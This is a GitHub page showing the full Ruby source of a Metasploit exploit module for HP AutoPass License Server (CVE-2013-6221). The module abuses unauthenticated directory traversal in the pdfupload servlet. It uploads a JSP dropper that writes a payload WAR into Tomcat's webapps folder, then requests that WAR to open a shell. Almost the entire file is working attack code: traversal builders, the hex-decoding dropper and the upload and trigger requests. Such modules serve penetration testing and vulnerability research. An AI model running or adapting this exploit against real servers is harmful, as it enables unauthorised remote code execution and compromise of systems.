Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
metasploit-framework/modules/exploits/windows/http/hp_autopass_license_traversal.rb /
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
254 lines (215 sloc)
8.84 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: https://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| class MetasploitModule < Msf::Exploit::Remote | |
| Rank = GreatRanking | |
| include Msf::Exploit::Remote::HttpClient | |
| include Msf::Exploit::FileDropper | |
| def initialize(info = {}) | |
| super(update_info(info, | |
| 'Name' => 'HP AutoPass License Server File Upload', | |
| 'Description' => %q{ | |
| This module exploits a code execution flaw in HP AutoPass License Server. It abuses two | |
| weaknesses in order to get its objective. First, the AutoPass application doesn't enforce | |
| authentication in the CommunicationServlet component. Second, it's possible to abuse a | |
| directory traversal when uploading files thorough the same component, allowing to upload | |
| an arbitrary payload embedded in a JSP. The module has been tested successfully on | |
| HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50. | |
| }, | |
| 'Author' => | |
| [ | |
| 'rgod <rgod[at]autistici.org>', # Vulnerability discovery | |
| 'juan vazquez' # Metasploit module | |
| ], | |
| 'License' => MSF_LICENSE, | |
| 'References' => | |
| [ | |
| ['CVE', '2013-6221'], | |
| ['ZDI', '14-195'], | |
| ['BID', '67989'], | |
| ['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04333125'] | |
| ], | |
| 'Privileged' => true, | |
| 'Platform' => %w{ java }, | |
| 'Arch' => ARCH_JAVA, | |
| 'Targets' => | |
| [ | |
| ['Windows 2003 SP2 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50', | |
| { | |
| 'InstallDepth' => 4, | |
| 'InstallFolder' => '/HP AutoPass License Server/HP AutoPass License Server', | |
| 'WebappsDepth' => 1 | |
| } | |
| ], | |
| ['Windows 2008 32 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50', | |
| { | |
| 'InstallDepth' => 7, | |
| 'InstallFolder' => '/Program Files/HP/HP AutoPass License Server/HP AutoPass License Server/HP AutoPass License Server', | |
| 'WebappsDepth' => 1 | |
| } | |
| ], | |
| ['Windows 2008 64 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50', | |
| { | |
| 'InstallDepth' => 7, | |
| 'InstallFolder' => '/Program Files (x86)/HP/HP AutoPass License Server/HP AutoPass License Server/HP AutoPass License Server', | |
| 'WebappsDepth' => 1 | |
| } | |
| ], | |
| ['Windows 2012 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50', | |
| { | |
| 'InstallDepth' => 4, | |
| 'InstallFolder' => '/HP AutoPass License Server/HP AutoPass License Server', | |
| 'WebappsDepth' => 1 | |
| } | |
| ] | |
| ], | |
| 'DefaultTarget' => 0, | |
| 'DisclosureDate' => '2014-01-10')) | |
| register_options( | |
| [ | |
| Opt::RPORT(5814), | |
| OptString.new('TARGETURI', [true, 'Path to HP AutoPass License Server Application', '/autopass']) | |
| ]) | |
| register_advanced_options( | |
| [ | |
| OptInt.new('INSTALL_DEPTH', [false, 'Traversal Depth to reach the HP AutoPass License Server folder']), | |
| OptString.new('INSTALL_FOLDER', [false, 'HP AutoPass License Server folder']), | |
| OptInt.new('WEBAPPS_DEPTH', [false, 'Traversal Depth to reach the Tomcat webapps folder']) | |
| ]) | |
| end | |
| def check | |
| check_code = Exploit::CheckCode::Safe | |
| res = send_request_cgi( | |
| { | |
| 'uri' => normalize_uri(target_uri.path.to_s, "cs","pdfupload"), | |
| 'method' => 'POST' | |
| }) | |
| unless res | |
| check_code = Exploit::CheckCode::Unknown | |
| end | |
| if res && res.code == 500 && | |
| res.body.to_s.include?("HP AutoPass License Server") && | |
| res.body.to_s.include?("java.lang.NullPointerException") && | |
| res.body.to_s.include?("com.hp.autopass") | |
| check_code = Exploit::CheckCode::Detected | |
| end | |
| check_code | |
| end | |
| def exploit | |
| app_base = rand_text_alphanumeric(4+rand(32-4)) | |
| war = payload.encoded_war({ :app_name => app_base }).to_s | |
| war_filename = "#{app_base}.war" | |
| # By default, the working directory when executing the JSP is: | |
| # C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\bin | |
| # The war should be dropped to the next location to autodeploy: | |
| # C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\webapps | |
| war_traversal = webapps_traversal | |
| war_traversal << "webapps/#{war_filename}" | |
| dropper = jsp_drop_bin(war, war_traversal) | |
| dropper_filename = rand_text_alpha(8) + ".jsp" | |
| print_status("Uploading the JSP dropper #{dropper_filename}...") | |
| # The JSP, by default, is uploaded to: | |
| # C:\Program Files\HP\HP AutoPass License Server\AutoPass\LicenseServer\conf\pdfiles\ | |
| # In order to execute it, through the AutoPass application we would like to drop it here: | |
| # C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\webapps\autopass\scripts | |
| dropper_traversal = install_traversal | |
| dropper_traversal << "#{install_folder}/webapps/autopass/scripts/#{dropper_filename}" | |
| res = upload_file(dropper_traversal, dropper) | |
| register_files_for_cleanup("#{webapps_traversal}webapps/autopass/scripts/#{dropper_filename}") | |
| register_files_for_cleanup("#{webapps_traversal}webapps/#{war_filename}") | |
| unless res && res.code == 500 && | |
| res.body.to_s.include?("HP AutoPass License Server") && | |
| res.body.to_s.include?("java.lang.NullPointerException") && | |
| res.body.to_s.include?("com.hp.autopass") | |
| print_error("Unexpected response... upload maybe failed, trying anyway...") | |
| end | |
| res = send_request_cgi({ | |
| 'uri' => normalize_uri(target_uri.path, "scripts", dropper_filename), | |
| 'method' => 'GET' | |
| }) | |
| unless res and res.code == 200 | |
| print_error("Unexpected response after executing the dropper...") | |
| end | |
| 10.times do | |
| select(nil, nil, nil, 2) | |
| # Now make a request to trigger the newly deployed war | |
| print_status("Attempting to launch payload in deployed WAR...") | |
| res = send_request_cgi( | |
| { | |
| 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8) + ".jsp"), | |
| 'method' => 'GET' | |
| }) | |
| # Failure. The request timed out or the server went away. | |
| break if res.nil? | |
| # Success! Triggered the payload, should have a shell incoming | |
| break if res.code == 200 | |
| end | |
| end | |
| def webapps_traversal | |
| if datastore['WEBAPPS_DEPTH'] > 0 | |
| depth = datastore['WEBAPPS_DEPTH'] | |
| elsif target['WebappsDepth'] | |
| depth = target['WebappsDepth'] | |
| else | |
| depth = 1 | |
| end | |
| "../" * depth | |
| end | |
| def install_traversal | |
| if datastore['INSTALL_DEPTH'] > 0 | |
| depth = datastore['INSTALL_DEPTH'] | |
| elsif target['InstallDepth'] | |
| depth = target['InstallDepth'] | |
| else | |
| depth = 4 | |
| end | |
| "/.." * depth | |
| end | |
| def install_folder | |
| if !datastore['INSTALL_FOLDER'].blank? | |
| folder = datastore['INSTALL_FOLDER'] | |
| elsif target['InstallFolder'] | |
| folder = target['InstallFolder'] | |
| else | |
| folder = "/HP AutoPass License Server/HP AutoPass License Server" | |
| end | |
| folder | |
| end | |
| # Using a JSP dropper because the vulnerability doesn't allow to upload | |
| # 'binary' files, so a WAR can't be uploaded directly. | |
| def jsp_drop_bin(bin_data, output_file) | |
| jspraw = %Q|<%@ page import="java.io.*" %>\n| | |
| jspraw << %Q|<%\n| | |
| jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| | |
| jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n| | |
| jspraw << %Q|int numbytes = data.length();\n| | |
| jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n| | |
| jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n| | |
| jspraw << %Q|{\n| | |
| jspraw << %Q| char char1 = (char) data.charAt(counter);\n| | |
| jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n| | |
| jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n| | |
| jspraw << %Q| comb <<= 4;\n| | |
| jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n| | |
| jspraw << %Q| bytes[counter/2] = (byte)comb;\n| | |
| jspraw << %Q|}\n| | |
| jspraw << %Q|outputstream.write(bytes);\n| | |
| jspraw << %Q|outputstream.close();\n| | |
| jspraw << %Q|%>\n| | |
| jspraw | |
| end | |
| def upload_file(file_name, contents) | |
| post_data = Rex::MIME::Message.new | |
| post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadedFile\"; filename=\"#{file_name}\"") | |
| data = post_data.to_s | |
| res = send_request_cgi( | |
| { | |
| 'uri' => normalize_uri(target_uri.path.to_s, "cs","pdfupload"), | |
| 'method' => 'POST', | |
| 'data' => data, | |
| 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" | |
| }) | |
| res | |
| end | |
| end |